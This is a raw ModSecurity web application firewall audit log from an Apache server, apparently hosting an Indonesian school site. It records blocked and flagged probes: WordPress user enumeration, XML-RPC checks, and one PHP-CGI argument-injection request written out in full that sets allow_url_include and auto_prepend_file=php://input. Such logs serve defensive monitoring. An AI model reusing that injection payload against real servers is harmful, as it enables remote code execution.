2) Stopwatch: 1747444214782685 2888 (- - -) Stopwatch2: 1747444214782685 2888; combined=1550, p1=488, p2=971, p3=0, p4=0, p5=91, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6b7b031-Z-- --0e344c5e-A-- [17/May/2025:08:10:27 +0700] aCfiA-m4kjNN-hEbWjJA6gAAAEM 103.236.140.4 43670 103.236.140.4 8181 --0e344c5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0e344c5e-C-- demo.sayHello --0e344c5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e344c5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444227862791 5821 (- - -) Stopwatch2: 1747444227862791 5821; combined=4306, p1=558, p2=3494, p3=31, p4=35, p5=123, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e344c5e-Z-- --dcfa6265-A-- [17/May/2025:08:11:09 +0700] aCfiLRKi5m5upc8uMd6iDQAAAMc 103.236.140.4 43674 103.236.140.4 8181 --dcfa6265-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dcfa6265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcfa6265-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444269229960 3212 (- - -) Stopwatch2: 1747444269229960 3212; combined=1425, p1=497, p2=896, p3=0, p4=0, p5=32, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcfa6265-Z-- --1bc08577-A-- [17/May/2025:08:11:14 +0700] aCfiMhKi5m5upc8uMd6iDwAAAMo 103.236.140.4 43678 103.236.140.4 8181 --1bc08577-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1bc08577-C-- demo.sayHello --1bc08577-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bc08577-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444274721386 5787 (- - -) Stopwatch2: 1747444274721386 5787; combined=4070, p1=545, p2=3299, p3=26, p4=29, p5=100, sr=74, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bc08577-Z-- --c719163d-A-- [17/May/2025:08:12:31 +0700] aCfifxKi5m5upc8uMd6iFQAAANM 103.236.140.4 43692 103.236.140.4 8181 --c719163d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --c719163d-C-- --c719163d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c719163d-E-- --c719163d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444351284855 3977 (- - -) Stopwatch2: 1747444351284855 3977; combined=2188, p1=542, p2=1613, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c719163d-Z-- --b4857522-A-- [17/May/2025:08:13:38 +0700] aCfiwhKi5m5upc8uMd6iGAAAANc 103.236.140.4 43700 103.236.140.4 8181 --b4857522-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4857522-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4857522-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444418672259 3028 (- - -) Stopwatch2: 1747444418672259 3028; combined=1279, p1=426, p2=818, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4857522-Z-- --325ae962-A-- [17/May/2025:08:13:42 +0700] aCfixhKi5m5upc8uMd6iGQAAANg 103.236.140.4 43704 103.236.140.4 8181 --325ae962-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --325ae962-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --325ae962-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444422728852 2063 (- - -) Stopwatch2: 1747444422728852 2063; combined=971, p1=312, p2=633, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --325ae962-Z-- --0605641c-A-- [17/May/2025:08:13:45 +0700] aCfiyQTOsBn9MSWb6WJueQAAAIM 103.236.140.4 43706 103.236.140.4 8181 --0605641c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.54 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0605641c-C-- demo.sayHello --0605641c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0605641c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444425601480 5026 (- - -) Stopwatch2: 1747444425601480 5026; combined=3942, p1=438, p2=3285, p3=33, p4=34, p5=90, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0605641c-Z-- --8ed63473-A-- [17/May/2025:08:13:55 +0700] aCfi0xKi5m5upc8uMd6iGwAAAME 103.236.140.4 43712 103.236.140.4 8181 --8ed63473-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8ed63473-C-- demo.sayHello --8ed63473-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ed63473-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444435024765 5495 (- - -) Stopwatch2: 1747444435024765 5495; combined=3755, p1=494, p2=3076, p3=32, p4=35, p5=71, sr=62, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ed63473-Z-- --d43f9e11-A-- [17/May/2025:08:14:07 +0700] aCfi3wTOsBn9MSWb6WJuegAAAIQ 103.236.140.4 43716 103.236.140.4 8181 --d43f9e11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d43f9e11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d43f9e11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444447199864 2963 (- - -) Stopwatch2: 1747444447199864 2963; combined=1291, p1=439, p2=822, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d43f9e11-Z-- --ae248146-A-- [17/May/2025:08:14:15 +0700] aCfi5xKi5m5upc8uMd6iHQAAAMU 103.236.140.4 43720 103.236.140.4 8181 --ae248146-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ae248146-C-- demo.sayHello --ae248146-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae248146-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444455931002 6480 (- - -) Stopwatch2: 1747444455931002 6480; combined=4634, p1=631, p2=3765, p3=40, p4=42, p5=94, sr=85, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae248146-Z-- --9ae46255-A-- [17/May/2025:08:19:33 +0700] aCfkJXyxdQCiyU1ENFcnfgAAAA8 103.236.140.4 43748 103.236.140.4 8181 --9ae46255-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ae46255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ae46255-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444773506165 2787 (- - -) Stopwatch2: 1747444773506165 2787; combined=1234, p1=424, p2=781, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ae46255-Z-- --00780128-A-- [17/May/2025:08:19:40 +0700] aCfkLHyxdQCiyU1ENFcnfwAAABI 103.236.140.4 43752 103.236.140.4 8181 --00780128-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --00780128-C-- demo.sayHello --00780128-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --00780128-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444780881989 5404 (- - -) Stopwatch2: 1747444780881989 5404; combined=4021, p1=525, p2=3282, p3=29, p4=32, p5=91, sr=89, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00780128-Z-- --5c07a86e-A-- [17/May/2025:08:21:15 +0700] aCfki3yxdQCiyU1ENFcngQAAABQ 103.236.140.4 43758 103.236.140.4 8181 --5c07a86e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5c07a86e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c07a86e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444875259287 2833 (- - -) Stopwatch2: 1747444875259287 2833; combined=1244, p1=431, p2=783, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c07a86e-Z-- --fa4c3812-A-- [17/May/2025:08:21:20 +0700] aCfkkHyxdQCiyU1ENFcngwAAABg 103.236.140.4 43762 103.236.140.4 8181 --fa4c3812-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fa4c3812-C-- demo.sayHello --fa4c3812-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa4c3812-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444880117505 6418 (- - -) Stopwatch2: 1747444880117505 6418; combined=4673, p1=587, p2=3845, p3=37, p4=42, p5=97, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa4c3812-Z-- --0a479d17-A-- [17/May/2025:08:21:26 +0700] aCfklnyxdQCiyU1ENFcnhQAAABc 103.236.140.4 43766 103.236.140.4 8181 --0a479d17-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0a479d17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a479d17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444886205821 3057 (- - -) Stopwatch2: 1747444886205821 3057; combined=1335, p1=465, p2=839, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a479d17-Z-- --3c101c2d-A-- [17/May/2025:08:21:26 +0700] aCfklnyxdQCiyU1ENFcnhgAAAAI 103.236.140.4 43768 103.236.140.4 8181 --3c101c2d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3c101c2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c101c2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444886221904 1972 (- - -) Stopwatch2: 1747444886221904 1972; combined=1034, p1=340, p2=667, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c101c2d-Z-- --b3d07b5b-A-- [17/May/2025:08:21:29 +0700] aCfkmRKi5m5upc8uMd6iJQAAANU 103.236.140.4 43770 103.236.140.4 8181 --b3d07b5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b3d07b5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 